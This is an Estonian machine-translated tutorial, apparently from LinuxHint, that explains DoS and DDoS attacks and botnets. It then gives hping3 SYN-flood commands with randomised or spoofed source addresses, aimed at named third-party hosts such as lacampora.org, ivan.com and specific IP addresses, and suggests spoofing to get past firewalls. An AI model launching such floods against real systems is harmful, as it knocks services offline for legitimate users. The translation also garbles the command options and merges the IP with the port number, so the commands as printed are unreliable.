DOS-i rünnakud
Teenuse keelamise (DOS) rünnak on väga lihtne tehnika teenuste juurdepääsetavuse keelamiseks (seetõttu nimetatakse seda teenuse keelamise rünnakuks). See rünnak seisneb sihtmärgi ülekoormamises liiga suurte pakettide või suures koguses neid.
Kuigi seda rünnakut on väga lihtne teostada, ei kahjusta see sihtmärgi teavet ega privaatsust, see ei ole läbitungiv rünnak ja selle eesmärk on ainult takistada juurdepääsu sihtmärgile.
Pakettide hulga saatmisega ei saa sihtmärk ründajatel kätt takistada serveril seaduslikele kasutajatele teenindamist.
DOS-rünnakud viiakse läbi ühest seadmest, seetõttu on neid lihtne peatada, blokeerides ründaja IP, kuid ründaja saab siht-IP-aadressi muuta ja isegi võltsida (kloonida), kuid tulemüüridel pole selliste rünnakutega raske toime tulla , vastupidiselt sellele, mis juhtub DDOS-i rünnakutega.
DDOS-i rünnakud
Distributed Service Denial of Service (DDOS) rünnak sarnaneb DOS-i rünnakuga, kuid seda tehakse samaaegselt erinevatest sõlmedest (või erinevatest ründajatest). Tavaliselt viivad DDOS-i rünnakud läbi robotivõrgud. Bottvõrgud on automatiseeritud skriptid või programmid, mis nakatavad arvutit automatiseeritud toimingu (antud juhul DDOS-i rünnaku) sooritamiseks. Häkker võib luua robotivõrgu ja nakatada paljusid arvuteid, kust robotivõrgud käivitavad DOS-i rünnakud. See, et paljud robotvõrgud lasevad, muudab DOS-i rünnaku DDOS-i rünnakuks (seetõttu nimetatakse seda "hajutatud").
Muidugi on erandeid, mille puhul DDOS-i rünnakuid korraldasid tõelised inimründajad, näiteks tuhandete inimeste poolt integreeritud häkkerite rühmitus Anonymous kasutas seda tehnikat selle lihtsa rakendamise tõttu väga sageli (selleks oli vaja ainult vabatahtlikke, kes jagasid oma eesmärki), näiteks jättis anonüümne Gaddafi Liibüa valitsuse sissetungi ajal täielikult lahti, Liibüa riik jäi kaitsetuks enne tuhandeid ründajaid kogu maailmast.
Seda tüüpi rünnakuid, mida tehakse paljudest erinevatest sõlmedest, on äärmiselt raske ära hoida ja peatada ning nende lahendamiseks on tavaliselt vaja spetsiaalset riistvara, seda seetõttu, et tulemüürid ja kaitserakendused pole valmis tuhandete ründajatega samaaegselt toime tulema. See pole hping3 juhtum, enamus selle tööriista kaudu toimuvatest rünnakutest blokeeritakse kaitseseadmete või tarkvara abil, kuid see on kasulik kohalikes võrkudes või halvasti kaitstud sihtmärkide vastu.
Hpingist3
Tööriist hping3 võimaldab teil saata manipuleeritud pakette. See tööriist võimaldab teil kontrollida pakettide suurust, kogust ja killustatust, et sihtmärk üle koormata ning mööda tulemüüre või rünnata neid. Hping3 võib olla kasulik turvalisuse või võimekuse testimiseks, selle abil saate testida tulemüüride efektiivsust ja kui server suudab hallata suurt hulka pakette. Allpool leiate juhised selle kohta, kuidas hping3 turvatestimise eesmärgil kasutada.
DDOS-i rünnakute alustamine hping3 abil:
Debiani ja Linuxi põhistes jaotustes saate installida hping3, käivitades:
# apt install hping3 -y
Lihtne DOS-i (mitte DDOS) rünnak oleks:
# sudo hping3 -S --uputus -V -p 80170.155.9.185
Kus:
sudo: annab hping3 käivitamiseks vajalikud privileegid.
hping3: kutsub hping3 programmi.
-S: määrab SYN paketid.
-üleujutus: tulistage oma äranägemise järgi, vastuseid eiratakse (sellepärast vastuseid ei näidata) ja paketid saadetakse võimalikult kiiresti.
-V: Paljusõnalisus.
-lk 80: port 80, saate selle numbri asendada teenuse suhtes, mida soovite rünnata.
170.155.9.185: siht-IP.
Üleujutus SYN-pakettide abil pordi 80 vastu:
Järgmine näide kujutab SYN-rünnakut lacampora vastu.org:
# sudo hping3 lacampora.org -q -n -d 120 -S -p 80 --uputus --rand-allikasKus:
Lacampora.org: on sihtmärk
-q: lühiväljund
-n: näita host-i asemel siht-IP-d.
-d 120: määrake paketi suurus
-rand-allikas: peida IP-aadress.
Järgmine näide näitab veel üht võimalikku üleujutuse näidet:
SYN üleujutus sadama 80 vastu:
# sudo hping3 --rand-source ivan.com -S -q -p 80 --uputus
Hping3 abil saate oma sihtmärke rünnata ka võltsitud IP-ga. Tulemüürist möödumiseks võite isegi kloonida oma siht-IP-i või mis tahes lubatud aadressi (võite selle saavutada näiteks Nmapi või nuusutajaga, et kuulata loodud ühendused).
Süntaks oleks:
# sudo hping3 -aSelles praktilises näites näib rünnak:
# sudo hping3 -a 190.0.175.100 190.0.175.100 -S -q -p80 --kiiremini -c2
Loodan, et leidsite selle õpetamise hping3 kohta kasulikuks. Järgige LinuxHinti, et saada rohkem näpunäiteid ja värskendusi Linuxi ja võrgu kohta.